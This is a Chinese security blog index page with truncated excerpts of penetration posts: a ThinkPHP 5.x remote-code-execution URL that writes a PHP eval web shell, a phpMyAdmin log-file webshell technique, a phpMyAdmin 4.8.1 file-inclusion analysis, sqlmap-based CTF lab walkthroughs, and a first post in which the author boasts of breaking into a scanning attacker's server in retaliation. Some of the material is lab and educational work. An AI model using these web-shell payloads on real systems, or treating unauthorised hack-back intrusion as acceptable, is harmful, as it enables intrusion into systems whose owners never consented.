Myluzh Blog

Strive to become a dream architect.

记录一次对恶意攻击者的反向渗透

2020-11-27 myluzh SECURE

0x01 前言 今天在进服务器面板后台,看到防火墙有拦截内容,一看IP还是腾讯云的IP,有点意思,GET了我网站的一个URL地址如下,这应该是扫ThinkPHP漏洞的。 /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} 0x02 渗透 这篇文章所呈现技术比价低级,本来不想记录的,但是好不容易遇到一个这么简单的,过程这么顺利的渗透,还是记录下来哈哈。 敢扫我的机子,我抱着试试看的态度也尝试了一波渗透,虽然好久没有玩了,但是基本功还是在的。 namp扫了一波端口,主要发现80端口跟3389开着(很明显是个windows的服务器),打算先从网站入手。 直接访问http://111.xx.xx.xx/跳转到了http://111.xx.xx.xx/9panel/,是一个Websoft9的镜像管理运维面板。 直接访问phpmyadmin加上提示的root账号密码,真的进去了,那一切就好办了起来,phpinfo看了下网站目录,网站实际目录为:C:\websoft9\wampstack\apps\9panel 然后直接p...

阅读全文>>

标签: 渗透

评论(0) (892)

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用

2020-3-25 myluzh PHP

0x01影响版本: ThinkPHP v5.0系列<5.0.23 ThinkPHP v5.1系列<5.1.31 0x02漏洞分析: 关键代码: // 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller')); 该漏洞形成的原因是ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,在没有开启强制路由的情况下,攻击者可以通过输入‘\’字符的方式调用任意方法,从而实现远程代码执行。 0x03入侵利用 1. 写入 Shell http//localhost/thinkphp-5.1.29/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_REQUEST[...

阅读全文>>

标签: 渗透 php 漏洞 ThinkPHP 远程命令执行

评论(0) (1115)

phpMyAdmin利用日志文件get webshell

2020-3-3 myluzh PHP

条件:需要使用root登陆phpmyadmin 0x01开启日志 进入phpmyadmin后,选择变量 1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志 set global general_log='on' 2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可通过执行sql语句,修改日志保存位置  set global general_log_file='D:/phpstudy_pro/WWW/log.php' 要写日志文件路径必须要知道根路径,否则即使写入了也无法访问,也就自然无法getshell。可以通过sql语句show variables like 'datadir'查询数据库位置,一般情况可以知道根路径。爆路径的方法具体情况具体分析   0x02写入shell 执行sql查询语句,然后php一句话就会被记录到日志文件中。 SELECT"<?php @eval($_REQUEST['a']);?>" 我们可以查看日志文件,一句话已经被写入: 0x03拿shell 访问站点...

阅读全文>>

标签: 渗透 phpMyAdmin 日志 getwebshell

评论(0) (628)

phpMyAdmin4.8.1 任意文件包含漏洞分析与利用

2020-3-3 myluzh PHP

0x01影响版本 phpmyadmin 4.8.1 (需要登陆才能利用) 复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip 0x02漏洞分析 index.php 55-63行代码 if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 0x03漏洞利用 1.执行sql语句,查询当前数据库路径。 show vari...

阅读全文>>

标签: 渗透 漏洞 phpMyAdmin 4.8.1 文件包含

评论(0) (666)

JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记

2020-2-26 myluzh SECURE

JIS-CTF-VulnUpload靶机共有5个Flag,找到它们! 0x01初步探测 靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.1.107 nmap扫描了下靶机端口,只有80端口跟22端口开着 0x02账号爆破 那就访问http://192.168.1.107先看看吧,跳转到了login.php页面 看到了登陆界面,那就先爆破下呗,可能账号密码就出来了呢,但事实证明爆破无果。 0x03第一个flag 去dirb扫了下,扫到了个http://192.168.1.107/flag/,直接访问,拿到了第一个flag The 1st flag is : {8734509128730458630012095} 0x04第二个flag 继续看dirb扫出来的铭感链接,有个链接引起了我的注意http://192.168.1.107/admin_area/,访问一下却显示The admin area not work :),查看了网页源代码,拿到了第二个flag,而且还有也直接拿到了username : admin pas...

阅读全文>>

标签: 渗透 靶机 JIS-CTF

评论(0) (3308)

CTF4靶机渗透测试笔记

2020-2-25 myluzh SECURE

0x01初步探测 CTF4靶机导入虚拟机后,直接使用netdiscover命令扫描,找到靶机。 nmap命令扫描目标靶机端口,看看有哪些端口开放 可以看到80http 22ssh 25smtp端口开着 0x02查找漏洞 直接访问http地址,发现好像能sql注入 0x03 sql注入 sqlmap跑下数据库(其实没什么必要) #sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dbs 跑下数据表 #sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --tables 发现有个user表,直接跑user表字段 #sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --columns -T "user" 直接爆用户跟密码 #sqlmap -u "http://19...

阅读全文>>

标签: 渗透 靶机 ctf

评论(0) (2297)